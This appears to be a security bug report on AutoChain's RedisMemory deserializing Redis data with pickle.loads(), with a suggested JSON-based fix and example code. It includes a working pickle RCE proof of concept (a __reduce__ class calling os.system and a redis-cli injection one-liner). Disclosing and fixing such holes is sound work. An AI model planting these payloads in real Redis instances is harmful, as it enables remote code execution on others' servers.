Bug Description
RedisMemory uses pickle.loads() to deserialize data retrieved from Redis. Python's pickle module can execute arbitrary code during deserialization. If an attacker gains write access to the Redis instance (e.g., through an exposed Redis port, shared Redis cluster, or Redis command injection), they can store a malicious pickle payload that executes arbitrary code when loaded by AutoChain.
Location
autochain/memory/redis_memory.py:40,61
Reproduction
# Attacker writes malicious pickle to Redis:
import pickle
import redis
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

r = redis.Redis()
r.set("autochain_prefix:key", pickle.dumps(Exploit()))

# When AutoChain loads this key via RedisMemory.load_memory():
# pickle.loads(pickled)  # Executes os.system("id > /tmp/pwned")
# Verify Redis is accessible (default: no auth required)
redis-cli SET "autochain:ChatMessageHistory" "$(python3 -c 'import pickle,os; print(pickle.dumps(type("X",(),{"__reduce__":lambda s:(os.system,("id",))})()), end="")')"
Impact
Remote code execution on the server running AutoChain, if Redis is shared or exposed.
Suggested Fix
# Option 1: Use JSON serialization instead of pickle
import json

def load_memory(self, key=None, default=None, **kwargs):
    data = self.redis_client.get(key)
    if not data:
        return default
    return json.loads(data)  # Safe: only parses JSON data

# Option 2: If complex objects must be stored, use a restricted deserializer
# like jsonpickle with a whitelist, or MessagePack
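To show Option 1 end to end, here is an added example (not AutoChain's code) of a memory class that writes and reads only JSON, so a pickle blob planted in Redis is treated as corrupt data rather than executed. The class name JsonRedisMemory, the save_memory/load_memory method names, the key prefix and the FakeRedis stand-in for redis-py are all assumptions made so the example runs offline; the real client returns bytes from get() in the same way.

```python
import json
from typing import Any, Dict, Optional


class FakeRedis:
    """In-memory stand-in for redis.Redis (constructed for this example only).

    Mirrors the two calls the memory class needs: set() stores bytes,
    get() returns bytes or None, as redis-py does with decode_responses=False.
    """

    def __init__(self) -> None:
        self._store: Dict[str, bytes] = {}

    def set(self, key: str, value: bytes) -> None:
        self._store[key] = value

    def get(self, key: str) -> Optional[bytes]:
        return self._store.get(key)


class JsonRedisMemory:
    """Hypothetical pickle-free replacement for RedisMemory.

    Only JSON ever crosses the Redis boundary, so whoever can write to the
    Redis instance can at most corrupt stored history, not run code.
    """

    def __init__(self, redis_client, prefix: str = "autochain_prefix") -> None:
        self.redis_client = redis_client
        self.prefix = prefix  # assumed key prefix, not the project's

    def _key(self, key: str) -> str:
        return f"{self.prefix}:{key}"

    def save_memory(self, key: str, value: Any) -> None:
        # json.dumps raises TypeError for anything it cannot represent
        # (custom classes, bytes, ...), which is the failure mode we want:
        # nothing with executable semantics is ever written to Redis.
        self.redis_client.set(self._key(key), json.dumps(value).encode("utf-8"))

    def load_memory(self, key: str, default: Any = None) -> Any:
        data = self.redis_client.get(self._key(key))
        if not data:
            return default
        try:
            # json.loads only builds dict/list/str/int/float/bool/None.
            # Unlike pickle there is no hook that instantiates arbitrary
            # classes or calls arbitrary callables during parsing.
            return json.loads(data.decode("utf-8"))
        except (UnicodeDecodeError, json.JSONDecodeError):
            # A pickle payload (protocol 2+ starts with 0x80, which is not
            # valid UTF-8) or any other non-JSON bytes lands here: the
            # value is discarded instead of deserialized.
            return default


if __name__ == "__main__":
    client = FakeRedis()
    memory = JsonRedisMemory(client)
    memory.save_memory("history", [{"role": "user", "content": "hello"}])
    print(memory.load_memory("history"))
    # Simulate a foreign write of non-JSON bytes to the same key.
    client.set("autochain_prefix:history", b"\x80\x04not json")
    print(memory.load_memory("history", default="rejected"))
```

The decode-then-parse order matters: decoding to UTF-8 first means a binary pickle stream is rejected before json.loads ever sees it, and json.loads itself has no object-construction hook, so the only attacker-controlled outcome is a lost or garbled history entry.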
Found via automated codebase analysis. Happy to submit a PR if confirmed.